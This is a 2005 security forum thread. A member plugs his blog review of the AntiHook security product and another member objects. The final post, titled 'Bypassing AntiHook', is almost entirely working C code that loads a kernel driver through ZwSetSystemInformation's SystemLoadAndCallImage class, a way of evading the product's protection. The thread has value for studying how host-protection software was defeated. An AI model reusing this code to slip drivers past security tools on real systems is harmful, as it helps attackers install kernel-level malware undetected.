-
November 8th, 2005, 04:59 PM
#1
Banned
AntiHook 2.5 Review and more
Hi guys,
New big review for AntiHook 2.5 on my blog, check it out.
http://securityonthenet.blogspot.com/
Next in line: BufferZone Home, Safe’n’Sec Personal and Prevx Home.
Don’t forget the showdown between all products to declare the best “Painkiller Blog Choose” Award.
Cheers
_________________
Painkiller
----------------------------------
Hell yea
-
November 8th, 2005, 08:44 PM
#2
Act now because the first 50 callers will receive one of our "Security for Dummiez" handbooks which you can carry in your backpack.
C'mon dude. This site isn't an infomercial for your blog.
--TH13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
November 9th, 2005, 07:05 PM
#3
Banned
Dude, it's Google ads, after all it's Google Blogger ... what can I do ...
Painkiller
-
November 9th, 2005, 07:25 PM
#4
Bypassing AntiHook
Loading the driver

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */

/* Native counted Unicode string, declared locally (as in the NT headers). */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

/* Function pointers resolved from ntdll.dll at run time. */
NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

/* Input structure for the SystemLoadAndCallImage information class. */
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

#define SystemLoadAndCallImage 38

int main(void)
{
    SYSTEM_LOAD_AND_CALL_IMAGE img;
    WCHAR daPath[] = L"\\??\\c:\\some.sys";   /* native path of the driver image */

    /* Resolve RtlInitUnicodeString from ntdll.dll. */
    if (!(RtlInitUnicodeString = (void *)
            GetProcAddress(GetModuleHandle("ntdll.dll"),
                           "RtlInitUnicodeString")))
    {
        exit(1);
    }

    /* Resolve ZwSetSystemInformation from ntdll.dll. */
    if (!(ZwSetSystemInformation = (void *)
            GetProcAddress(GetModuleHandle("ntdll.dll"),
                           "ZwSetSystemInformation")))
    {
        exit(1);
    }

    RtlInitUnicodeString(&(img.ModuleName), daPath);

    /* Pass the image path with information class 38 and report the status. */
    if (NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage,
                                          &img,
                                          sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
    {
        printf("Loaded.\n");
    }
    else
    {
        printf("Not loaded.\n");
    }

    return 0;
}